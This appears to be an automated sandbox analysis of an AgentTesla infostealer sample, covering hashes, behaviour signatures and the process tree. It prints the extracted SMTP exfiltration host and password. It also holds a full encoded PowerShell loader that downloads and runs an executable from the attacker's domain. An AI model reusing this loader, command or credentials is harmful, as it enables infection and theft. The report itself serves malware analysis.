Analysis
-
max time kernel
143s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
30-08-2023 06:40
Static task
static1
Behavioral task
behavioral1
Sample
Especificación Cotización_DOC6467.exe
Resource
win7-20230712-en
General
-
Target
Especificación Cotización_DOC6467.exe
-
Size
1.2MB
-
MD5
39c65129bc2e871b8a7d09a31ceebb4b
-
SHA1
022d2c610c09c1b76626f1f7a0fdc6f199f94ffe
-
SHA256
0eb744ee1a95301432e7b9af6a3e4e67b18a02cb55baccf9c1a88b6aee906545
-
SHA512
f64125f54ebd085c3d204a20f14422be764a179dd9dc2fb5da8c021256282ec032bc6291bcf7f43ccb6e2609d2db90ff354b5203b19d3e381167446a42584d55
-
SSDEEP
24576:NTbBv5rUanfOOyeXEfqGOGleTM4WBGa6mXcqIAXiDFWmhHpa81yB:HBjf4rfqFVpLAXicQHg80
Malware Config
Extracted
Protocol: smtp- Host:
mqils.com - Port:
587 - Username:
[email protected] - Password:
+PT}MwwP2un&
Extracted
agenttesla
Protocol: smtp- Host:
mqils.com - Port:
587 - Username:
[email protected] - Password:
+PT}MwwP2un& - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 27 3928 powershell.exe -
Downloads MZ/PE file
-
resource behavioral2/files/0x0006000000023259-192.dat -
Executes dropped EXE 5 IoCs
pid Process 3252 o88e9.exe 2120 o88e9.exe 64 o88e9.exe 4748 o88e9.exe 3260 aukxjbck.msc -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 59 api.ipify.org -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3252 set thread context of 4748 3252 o88e9.exe 104 PID 3260 set thread context of 3872 3260 aukxjbck.msc 116 PID 3260 set thread context of 3924 3260 aukxjbck.msc 115 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3932 3872 WerFault.exe 116 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4576 schtasks.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 1344 ipconfig.exe 2688 ipconfig.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\Local Settings Especificación Cotización_DOC6467.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4272 WINWORD.EXE 4272 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 3928 powershell.exe 3928 powershell.exe 3252 o88e9.exe 3252 o88e9.exe 3252 o88e9.exe 3252 o88e9.exe 2324 powershell.exe 4748 o88e9.exe 4748 o88e9.exe 2324 powershell.exe 3260 aukxjbck.msc 3260 aukxjbck.msc 3260 aukxjbck.msc 3260 aukxjbck.msc 3260 aukxjbck.msc 3260 aukxjbck.msc 3260 aukxjbck.msc 3260 aukxjbck.msc 3260 aukxjbck.msc 3260 aukxjbck.msc 3260 aukxjbck.msc 3260 aukxjbck.msc 3924 RegSvcs.exe 3924 RegSvcs.exe 3924 RegSvcs.exe 3924 RegSvcs.exe 3924 RegSvcs.exe 3924 RegSvcs.exe 3924 RegSvcs.exe 3924 RegSvcs.exe 3924 RegSvcs.exe 3924 RegSvcs.exe 3924 RegSvcs.exe 3924 RegSvcs.exe 3924 RegSvcs.exe 3924 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3928 powershell.exe Token: SeDebugPrivilege 3252 o88e9.exe Token: SeDebugPrivilege 2324 powershell.exe Token: SeDebugPrivilege 4748 o88e9.exe Token: SeDebugPrivilege 3924 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 18 IoCs
pid Process 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4272 WINWORD.EXE 4748 o88e9.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 2064 wrote to memory of 4272 2064 Especificación Cotización_DOC6467.exe 80 PID 2064 wrote to memory of 4272 2064 Especificación Cotización_DOC6467.exe 80 PID 3432 wrote to memory of 3928 3432 cmd.exe 90 PID 3432 wrote to memory of 3928 3432 cmd.exe 90 PID 3928 wrote to memory of 1148 3928 powershell.exe 91 PID 3928 wrote to memory of 1148 3928 powershell.exe 91 PID 1148 wrote to memory of 1300 1148 csc.exe 92 PID 1148 wrote to memory of 1300 1148 csc.exe 92 PID 3928 wrote to memory of 3252 3928 powershell.exe 95 PID 3928 wrote to memory of 3252 3928 powershell.exe 95 PID 3928 wrote to memory of 3252 3928 powershell.exe 95 PID 3252 wrote to memory of 2324 3252 o88e9.exe 98 PID 3252 wrote to memory of 2324 3252 o88e9.exe 98 PID 3252 wrote to memory of 2324 3252 o88e9.exe 98 PID 3252 wrote to memory of 4576 3252 o88e9.exe 100 PID 3252 wrote to memory of 4576 3252 o88e9.exe 100 PID 3252 wrote to memory of 4576 3252 o88e9.exe 100 PID 3252 wrote to memory of 2120 3252 o88e9.exe 102 PID 3252 wrote to memory of 2120 3252 o88e9.exe 102 PID 3252 wrote to memory of 2120 3252 o88e9.exe 102 PID 3252 wrote to memory of 64 3252 o88e9.exe 103 PID 3252 wrote to memory of 64 3252 o88e9.exe 103 PID 3252 wrote to memory of 64 3252 o88e9.exe 103 PID 3252 wrote to memory of 4748 3252 o88e9.exe 104 PID 3252 wrote to memory of 4748 3252 o88e9.exe 104 PID 3252 wrote to memory of 4748 3252 o88e9.exe 104 PID 3252 wrote to memory of 4748 3252 o88e9.exe 104 PID 3252 wrote to memory of 4748 3252 o88e9.exe 104 PID 3252 wrote to memory of 4748 3252 o88e9.exe 104 PID 3252 wrote to memory of 4748 3252 o88e9.exe 104 PID 3252 wrote to memory of 4748 3252 o88e9.exe 104 PID 2064 wrote to memory of 4456 2064 Especificación Cotización_DOC6467.exe 105 PID 2064 wrote to memory of 4456 2064 Especificación Cotización_DOC6467.exe 105 PID 2064 wrote to memory of 4456 2064 Especificación Cotización_DOC6467.exe 105 PID 4456 wrote to memory of 4116 4456 wscript.exe 106 PID 4456 wrote to memory of 4116 4456 wscript.exe 106 PID 4456 wrote to memory of 4116 4456 wscript.exe 106 PID 4456 wrote to memory of 2976 4456 wscript.exe 107 PID 4456 wrote to memory of 2976 4456 wscript.exe 107 PID 4456 wrote to memory of 2976 4456 wscript.exe 107 PID 4116 wrote to memory of 1344 4116 cmd.exe 110 PID 4116 wrote to memory of 1344 4116 cmd.exe 110 PID 4116 wrote to memory of 1344 4116 cmd.exe 110 PID 2976 wrote to memory of 3260 2976 cmd.exe 111 PID 2976 wrote to memory of 3260 2976 cmd.exe 111 PID 2976 wrote to memory of 3260 2976 cmd.exe 111 PID 4456 wrote to memory of 4776 4456 wscript.exe 112 PID 4456 wrote to memory of 4776 4456 wscript.exe 112 PID 4456 wrote to memory of 4776 4456 wscript.exe 112 PID 4776 wrote to memory of 2688 4776 cmd.exe 114 PID 4776 wrote to memory of 2688 4776 cmd.exe 114 PID 4776 wrote to memory of 2688 4776 cmd.exe 114 PID 3260 wrote to memory of 3924 3260 aukxjbck.msc 115 PID 3260 wrote to memory of 3924 3260 aukxjbck.msc 115 PID 3260 wrote to memory of 3924 3260 aukxjbck.msc 115 PID 3260 wrote to memory of 3872 3260 aukxjbck.msc 116 PID 3260 wrote to memory of 3872 3260 aukxjbck.msc 116 PID 3260 wrote to memory of 3872 3260 aukxjbck.msc 116 PID 3260 wrote to memory of 3872 3260 aukxjbck.msc 116 PID 3260 wrote to memory of 3872 3260 aukxjbck.msc 116 PID 3260 wrote to memory of 3872 3260 aukxjbck.msc 116 PID 3260 wrote to memory of 3924 3260 aukxjbck.msc 115 PID 3260 wrote to memory of 3924 3260 aukxjbck.msc 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\Especificación Cotización_DOC6467.exe"C:\Users\Admin\AppData\Local\Temp\Especificación Cotización_DOC6467.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RarSFX0\rename.doc" /o ""2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4272
-
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" dbt-a.vbe2⤵
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release3⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /release4⤵
- Gathers network information
PID:1344
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c aukxjbck.msc ilhgewl.txt3⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\aukxjbck.mscaukxjbck.msc ilhgewl.txt4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"5⤵PID:3872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 806⤵
- Program crash
PID:3932
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /renew3⤵
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /renew4⤵
- Gathers network information
PID:2688
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -e ZgB1AG4AYwB0AGkAbwBuACAAYgA4ADEANQA4ADkAIAB7AHAAYQByAGEAbQAoACQAdwA0AGYAZQA1AGQAKQAkAGMAOQBmAGIAZQA1AD0AJwBoAGIANAAzAGUANAAnADsAJABhADgAMQAyADUAMwA9ACcAJwA7AGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAdwA0AGYAZQA1AGQALgBsAGUAbgBnAHQAaAA7ACQAaQArAD0AMgApAHsAJABrADYANQAzADQANwA4AD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJAB3ADQAZgBlADUAZAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAOwAkAGEAOAAxADIANQAzACsAPQBbAGMAaABhAHIAXQAoACQAawA2ADUAMwA0ADcAOAAgAC0AYgB4AG8AcgAgACQAYwA5AGYAYgBlADUAWwAoACQAaQAvADIAKQAlACQAYwA5AGYAYgBlADUALgBsAGUAbgBnAHQAaABdACkAOwB9AHIAZQB0AHUAcgBuACAAJABhADgAMQAyADUAMwA7AH0ADQAKACQAYgA3ADEANQAyADYAIAA9ACAAJwAxAGQAMQAxADUAZAA1AGQAMAAyADEANAAzAGIAMQBiADQANwA0ADcAMAAwADUAOQA1ADMAMQA3ADQANwA1AGEAMABiADUAMwA0ADgAMwAxADQAZAA0ADAAMQAxADUAMQAwADUANABjADYANgA0ADYAMABiADQAMAAwADEAMABmADUAMQAxAGQAMgBjADUAYQAxAGMAMAA3ADQANgA1AGMAMQA1ADYANwAwAGQAMQAwADQAMgA1AGEAMAA2ADUAMQAxAGIANQA5ADQAMQA0ADAAMABjADUAYQAwAGYANAAyADYANwA0AGEAMQA2ADQAMAAwAGQAMABmADEAYQA3ADcAMABjADUANQAwAGYAMABjADUAYgA0ADAAMQAxADUAZAAwAGIAMQAxADAAZgA0ADYAMQA2ADUAZAAwADYAMAA1ADEANAA2ADAAMQBjADQANwAxAGMAMAA3ADUAOQAxAGQAMgBjADcAYgA1ADMAMQA3ADQANwA1AGEAMABiADUAMwA0ADgAMwAxADQAZAA0ADAAMQAxADUAMQAwADUANABjADcAYQA1ADYAMQAxADAAZgA2ADUANgA4ADQANAA0ADYAMAA3ADUAOAAwADEAMAAxADEANAA1ADAAMAA5ADUANQAxAGIAMQAxADEANAA0ADMAMAA3ADUANQAwAGQAMAA0ADAAYwA0ADgAMwBlADcAMAAwADQAMABlADcAZAA1AGUAMQA1ADUAYgAxAGEAMQA2ADEAYwAxADEAMABlADUAMQAxAGEAMABjADUAMQA1AGYANQA2ADAANgA0AGEANABlADcAMQA1AGQAMQAxADQANgAxADEAMwAyADUAYgA1AGEAMABiADQAMAA1ADUANAAwADcAMwA1ADYAMQAxADYANAAxAGEAMABkADUANwA3ADIAMAAxADUAMAAxAGEAMAA3ADQANwA0ADAANAA3ADEAZAAzADUAMQAyADQAMQA1ADEAMAA5ADUAZAAwAGIANAAyADQANwA0ADcAMAA0ADQAMAAwADEAMAAxADEANAA1ADYAMQBkADQAMAAwAGQAMQAwADUAYQAxADMAMgBjADUAYQAxAGMAMwAyADQAMAA0ADEANAA1ADQAMwAwAGUAMAAxADAAMQA1ADYANABkADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEANAAwADAANQAwADAAMAAwADYANQAzADAANwAwAGEANABlADQANwA0ADcAMQA3ADUAZAAwADYAMAA1ADEANAA0ADkANQAwADAANwA1AGMAMAA0ADUANgAwAGIANABjADAAZgAzADMAMgA2ADUAOAA1AGYAMgBjADUAOQAxADgAMABkADQANgA0ADcANABkADEANgAwADMAMAA3ADQANgA1AGQAMAAwADUAOAA1AGIANQAwADEANgAxAGYAMgAwADUAYQAxAGMAMQAwADQAZAA2ADMAMABhADUAZAAwADYAMQA2ADAAOQAxADEAMgA5ADUAYgAwADkAMAA2ADcAOAA1AGEAMAA3ADQANgAwADkAMQAwADQAZAAxADEANABjADYAOQAxADgAMQA3ADUANgA1AGYAMABjADUANwA0ADgAMQAxADQAMAA1ADIAMQAxADUAZAAwAGIANAAyADUAMQA0AGIAMQAxADUAMQAxAGEAMABjADEANAA3AGEAMABiADQAMAAzADgAMQA2ADQANgAxADMAMQA2ADAAMwA1ADEAMAA2ADUAMgAwADEANABkADQANwAxAGMAMQAwADUAZAA1AGQAMAAyADEANAAxADAANQA3ADAANwAwAGIANQBjADEAZAA1ADMAMwA5ADcAMAA1AGYAMAA5ADcAZAAwADUAMQAyADUAYgA0ADEAMQAxADEAYwA0AGEAMAA5ADUAMQA0ADEAMABiADUAMQAwADQANQAxADAANgAxADEANAA5ADcAMQAwADYAMQA2ADQANgA0AGEAMwA1ADUAYgAwADEAMABjADQAMAAwAGUANAA3ADYAMgAwADEAMQAwADQAMAA0ADYAMAA0ADUAOAAzADgAMQAwADUAYgA0ADcAMAAwADUANwAxAGMANAAwADEAZAA2AGUAMQA1ADQAMQAwAGEAMABlADUAZAA1ADAANAA1ADQANwAxAGMAMAAzADQAMAA1AGEAMAA2ADEANAAwAGQAMQBhADQAMAA1ADYAMQA3ADUAYQA0ADgAMAAwADUAYgA1AGMAMAA5ADEANAAwADQANQA0ADAAMAAwADUANQAyADUAMgA0ADAAMgBiADUAYQA0ADcAMwA1ADQAMAAxAGEANAAyADUAZQA1ADIANQA2ADUANgA1AGIANQA2ADUAMAAxAGYAMwAwADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEANAAwADAANQAwADAAZAA1ADAANQAxADUANwA0ADQAMQA3ADUAZAA1AGQAMQAxADEANAAwAGIANQBiADUAMQA1ADcANQAyADAANwAwAGIANABlADUAYgA0ADYAMQAxADEANAAxAGQAMABiADUAYQA0ADcANAA1ADUAZgAwADkANQAzADAAZAA1ADcANQA2ADEAZAA1ADMAMQAyADQAMQA1ADEAMAA5ADUAZAAwAGIANAAyADQANwA0ADcAMAA0ADQAMAAwADEAMAAxADEANAA0ADUAMABhADUAZAAwAGMANAAyADUAYwAwADUANQBkADAAMgA1ADkAMAAxADUANQAxAGIANABjADQAZgAxAGMAMQAwADQAZAA0ADgAMgBjADUAYQAxAGMAMwAyADQAMAA0ADEANAA1ADQAZAA1AGIANQA3ADAAMQA1ADEAMAA0ADAAOQAxAGIANQA1ADAAZAA1ADcAMAAzADAANgA0ADAAMAAwADAAYwAwADIANQAwADAAYwA1ADEANABhADEANgAwADMANQBjADAANAAwAGUANQA2ADAAMwAwADYAMAA0ADAAMAAwAGEANQA3ADAANAAwADMANQAxADAANAAwAGQANAAwADEAZAAxAGEANQBlADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEANAAwADkANQA3ADAANwAwAGEANQAyADAANgAwAGEANQBmADQAMwA1ADUAMAA2ADAAMQAwAGQANABhADQAZAAwADAANQAwADAAMQAwAGEAMAAzADEAOAA1ADEANQBkADAANQA1AGQANQBhADAAZAAxAGIANAA3ADAANgA1ADEANQAyADUAMgAwADcANQAyADAAMQAwADkANQAxADAAMgAwADYANQAyADAANAA1ADEANQAyADUANwAwADQANQAzADAAMAA1AGUANQAyADAANwAwADYANQA3ADAANAAwAGMANQAzADAANAAxADEANABjADEAZAA1ADMAMAAwADQAZAA0ADcAMAAwADYAZgAzADUANAAyADQANAAxADMANQA4ADEANAAxADMANQAyADQAYwA3ADEANQBkADEAOAA1ADgAMQBhADAAMQAwADQANAA5ADAANAAxADAANQAyADAANAAxAGYANQA1ADQAYwA1ADgANQA1ADEAOAAwADMAMQBkADAAYwA1ADgANABlADAANAA0AGIAMgA2ADAANwA0ADgAMQBmADAAZgA0ADYAMABjADUAYQAxAGMANAAyADUAYgAwAGEAMAAxADAANQA1ADAANQAzADAAOQAwADMANQBlADUAOAA1AGUANQA2ADAAMgAwADQAMAAzADEAYwAwADkANQA3ADAANwAwAGEANQAyADAANgAwAGEANABlADEAYwA2ADYAMgBjADUAYQAxAGMAMwAyADQAMAA0ADEANABjADQANAA0ADYAMgBlADUAMQA1AGQAMAAyADQAMAAwADAANABlADAANAA0AGIANQAxADAANAA0ADQAMABkADQAMQA0ADcANAA1ADUAYgA1ADEAMAA2ADAANQAwAGIANQA0ADEAZAA1ADMAMgBmADUANQA0ADEAMQA2ADUAYwAwADkAMABlADEAYQA3ADAAMABhADQANAAxADEANABhADQANAAxAGYANQA1ADEAOAAwADkANQA3ADAANwAwAGEANQAyADAANgAwAGEANABlADQANAAxAGQAMgA5ADUAMQAwADYAMAA1ADQAMAA1AGIANABjADAAZgAwADQANQA0ADAAMAAwADUANQAyADUAMgA0ADAAMAAzADAAMQAwADAANQBjADAAMwA1AGEAMAAwADEAOAAxAGIAMwAwADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEAZAAxADgANABjADcAOAA1ADYAMABiADUAMwAxAGMAMABhADEAOAA1AGMANQBjADUAMAA1ADkANQBhADAANQAxAGYAMABhADQAMQAxAGMANAAyADUAYgAwAGEAMAAxADAANQA1ADAANQAzADEAZAAwADgAMQA4ADUANwAwADkAMQA2ADUANwA1AGIAMQBlADQAOQAxADUAMQAyADQAMQA1ADEAMAA5ADUAZAAwAGIANAAyADQANwA0ADcAMAA0ADQAMAAwADEAMAAxADEANAA0ADUAMABhADUAZAAwAGMANAAyADUAYQAwAGIAMAA2ADAAMQA1ADEANQA0ADUANwAxAGIANABjADQAZgAzADgAMQAwADUAYgA1ADAAMAAwADQANwAxAGIAMwAxADQAMAA1ADIAMQA3ADQAMAAyADEAMABjADUAMgA1AGMANAA1ADUAZQA1AGIAMAA0ADAAYwA1ADYAMAA2ADAANgA1ADUAMABjADUAMQA0ADQANAA1ADYANAAxAGEAMABkADUANwA1ADYAMQA2ADQANwAzAGIAMQA2ADUANQA0ADEAMQAxADcAZAAwADYAMAA0ADUAYgAxAGIAMgAwADUAYQAxAGUAMABiADQANgA1AGMAMABiADUAOQAwAGQAMABjADQAMAAxAGQAMgAyADUAMQAxAGMAMgA0ADUAYgA1AGYAMAAxADUAMQAxAGEAMwAyADUANQA0ADcAMABkADEAYwAyAGQAMABjADQAMgA1AGEAMQA3ADUAYgAwADYAMABmADUAMQA1AGQAMQAxADEAYQAzAGIAMQAyADUAMQA1ADAAMABjADUANQAwADQAMgA0ADUAYgA1AGYAMAAxADUAMQAxAGEANABjADcANQA0ADMAMQA1ADUAOAAwADEAMAAxADUANQA0ADcAMABjADUAYgAwADYAMgA2ADUANQA0ADcAMAA0ADEAZAA0ADgANAA5ADEANAAxADEAMwA5ADYAOAAwADcANQBhADAAYwA1ADYANQBjADEAYQAwAGQAMQBhADUAMQAxADEANABjADAAZgAzADgAMQAwADUAYgA1ADAAMAAwADQANwAxAGIANABjADYANwA0ADcAMAA0ADQANgAxAGMANABhADUAZQAwADAAMAAzADAAYwAwAGQAMAAxADAANgAxAGEANQBlADQAOQAxADgAMQA3ADUANgA1AGYAMABjADUANwA0ADgAMQAxADQAMAA1ADIAMQAxADUAZAAwAGIANAAyADQANwA0ADcAMQA3ADUAZAAwADYAMAA1ADEANAA1ADEANQBkADAANQA1AGQANQBhADAAZAAxAGIAMQA2ADQAMAAxAGEAMABiADUAYQA1ADQANAA1ADUAMwAwAGIAMAAzADUANgA1ADYANQBjADAAMwA0ADEAMQA5ADQANwA0ADcAMQA3ADUAZAAwADYAMAA1ADEANAA1AGIANQA3ADAAMAA1AGQANQA0ADAANwA1ADEANQA4ADEANgAwADAAMAAwADAAMAAwADAAMAAwADAAMAA0AGEANQA5ADQANwA0ADcAMQA3ADUAZAAwADYAMAA1ADEANAA0ADAANQAyADAAZAAwAGMAMAA0ADAANgAwAGUAMwA2ADQAMAAxAGEAMABiADUAYQA1ADQANABiADcAMQAwADUAMQAyADQAMAA0AGEANQBlADUAMgAwADcAMQAwADEAYwA1AGEAMABiADQAMAA0ADgAMABiADAAOQAwADMANQBlADUAZAA1ADQAMAA1ADUANwA1ADIAMAA3ADUAMQA1ADEANQA1ADEAYQA3AGYAMAAwADUAYQAwAGYAMQA2ADUAYwAwADgAMABjADEAZgA1ADUANQAwADEAZAA0ADgAMAA3ADQAZAAxAGMAMAA3ADEANAA0AGIANQAwADAANwA1ADAANQBiADAAOQA3ADAAMABhADUAYQAxAGUAMAA3ADQANgA0ADcANABiADYAMAAwADcAMgAwADQAZAA0ADcAMAAwADEAYwAwAGYAMAAxADUANQA1ADEAMAAwADAAZAA1AGYANABjADYANwA0ADYAMAA3ADQANwAxAGMAMQAwADUAZAA1AGQAMAAyADEAYwAwADEANABlADAANgAxAGEANAA5ADAANQA1AGUANABiADAAZgA0ADAANQAyADAAZAAwAGMAMAA0ADAANgAxADgANQA4ADEAYwAwAGIAMABhADUANQA0ADEANABjADEAYwAxADAANQA3ADAANwAwAGIANQBjADYAYQAwADAANQAwADAAMAAwADYANQAzADAANwAwAGEAMwA5ADEAYwA1AGEANABhADAANgA0ADEANAA3ADUAYwAwADEANQAxADAAMQA1AGUANQAxADUANgAxAGQAMgA5ADUAMQAwADYAMAA1ADQAMAA1AGIAMwA4ADEAZAA1ADMAMQBmADQANgA1ADYAMQAxADQAMQAxAGEAMABjADEANAA0ADAANQAyADAAZAAwAGMAMAA0ADAANgAwADgAMQA4ADQAOQAnADsADQAKACQAYgA3ADEANQAyADYAMgAgAD0AIABiADgAMQA1ADgAOQAoACQAYgA3ADEANQAyADYAKQA7AA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYgA3ADEANQAyADYAMgA7AA0ACgBbAHAAYgBhAGUAZgA4AF0AOgA6AGgANgA4ADYAMQBjAGEAKAApADsADQAKAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBtAHEAaQBsAHMALgBjAG8AbQAvAG8AcgBpAGcAaQBuAGEAbAAvAG0AaQBrAGUALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG8AOAA4AGUAOQAuAGUAeABlACIAOwANAAoAWwBwAGIAYQBlAGYAOABdADoAOgBuADgAYwA1ADkANgBjACgAKQA7AA==1⤵
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -e ZgB1AG4AYwB0AGkAbwBuACAAYgA4ADEANQA4ADkAIAB7AHAAYQByAGEAbQAoACQAdwA0AGYAZQA1AGQAKQAkAGMAOQBmAGIAZQA1AD0AJwBoAGIANAAzAGUANAAnADsAJABhADgAMQAyADUAMwA9ACcAJwA7AGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAdwA0AGYAZQA1AGQALgBsAGUAbgBnAHQAaAA7ACQAaQArAD0AMgApAHsAJABrADYANQAzADQANwA4AD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJAB3ADQAZgBlADUAZAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAOwAkAGEAOAAxADIANQAzACsAPQBbAGMAaABhAHIAXQAoACQAawA2ADUAMwA0ADcAOAAgAC0AYgB4AG8AcgAgACQAYwA5AGYAYgBlADUAWwAoACQAaQAvADIAKQAlACQAYwA5AGYAYgBlADUALgBsAGUAbgBnAHQAaABdACkAOwB9AHIAZQB0AHUAcgBuACAAJABhADgAMQAyADUAMwA7AH0ADQAKACQAYgA3ADEANQAyADYAIAA9ACAAJwAxAGQAMQAxADUAZAA1AGQAMAAyADEANAAzAGIAMQBiADQANwA0ADcAMAAwADUAOQA1ADMAMQA3ADQANwA1AGEAMABiADUAMwA0ADgAMwAxADQAZAA0ADAAMQAxADUAMQAwADUANABjADYANgA0ADYAMABiADQAMAAwADEAMABmADUAMQAxAGQAMgBjADUAYQAxAGMAMAA3ADQANgA1AGMAMQA1ADYANwAwAGQAMQAwADQAMgA1AGEAMAA2ADUAMQAxAGIANQA5ADQAMQA0ADAAMABjADUAYQAwAGYANAAyADYANwA0AGEAMQA2ADQAMAAwAGQAMABmADEAYQA3ADcAMABjADUANQAwAGYAMABjADUAYgA0ADAAMQAxADUAZAAwAGIAMQAxADAAZgA0ADYAMQA2ADUAZAAwADYAMAA1ADEANAA2ADAAMQBjADQANwAxAGMAMAA3ADUAOQAxAGQAMgBjADcAYgA1ADMAMQA3ADQANwA1AGEAMABiADUAMwA0ADgAMwAxADQAZAA0ADAAMQAxADUAMQAwADUANABjADcAYQA1ADYAMQAxADAAZgA2ADUANgA4ADQANAA0ADYAMAA3ADUAOAAwADEAMAAxADEANAA1ADAAMAA5ADUANQAxAGIAMQAxADEANAA0ADMAMAA3ADUANQAwAGQAMAA0ADAAYwA0ADgAMwBlADcAMAAwADQAMABlADcAZAA1AGUAMQA1ADUAYgAxAGEAMQA2ADEAYwAxADEAMABlADUAMQAxAGEAMABjADUAMQA1AGYANQA2ADAANgA0AGEANABlADcAMQA1AGQAMQAxADQANgAxADEAMwAyADUAYgA1AGEAMABiADQAMAA1ADUANAAwADcAMwA1ADYAMQAxADYANAAxAGEAMABkADUANwA3ADIAMAAxADUAMAAxAGEAMAA3ADQANwA0ADAANAA3ADEAZAAzADUAMQAyADQAMQA1ADEAMAA5ADUAZAAwAGIANAAyADQANwA0ADcAMAA0ADQAMAAwADEAMAAxADEANAA1ADYAMQBkADQAMAAwAGQAMQAwADUAYQAxADMAMgBjADUAYQAxAGMAMwAyADQAMAA0ADEANAA1ADQAMwAwAGUAMAAxADAAMQA1ADYANABkADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEANAAwADAANQAwADAAMAAwADYANQAzADAANwAwAGEANABlADQANwA0ADcAMQA3ADUAZAAwADYAMAA1ADEANAA0ADkANQAwADAANwA1AGMAMAA0ADUANgAwAGIANABjADAAZgAzADMAMgA2ADUAOAA1AGYAMgBjADUAOQAxADgAMABkADQANgA0ADcANABkADEANgAwADMAMAA3ADQANgA1AGQAMAAwADUAOAA1AGIANQAwADEANgAxAGYAMgAwADUAYQAxAGMAMQAwADQAZAA2ADMAMABhADUAZAAwADYAMQA2ADAAOQAxADEAMgA5ADUAYgAwADkAMAA2ADcAOAA1AGEAMAA3ADQANgAwADkAMQAwADQAZAAxADEANABjADYAOQAxADgAMQA3ADUANgA1AGYAMABjADUANwA0ADgAMQAxADQAMAA1ADIAMQAxADUAZAAwAGIANAAyADUAMQA0AGIAMQAxADUAMQAxAGEAMABjADEANAA3AGEAMABiADQAMAAzADgAMQA2ADQANgAxADMAMQA2ADAAMwA1ADEAMAA2ADUAMgAwADEANABkADQANwAxAGMAMQAwADUAZAA1AGQAMAAyADEANAAxADAANQA3ADAANwAwAGIA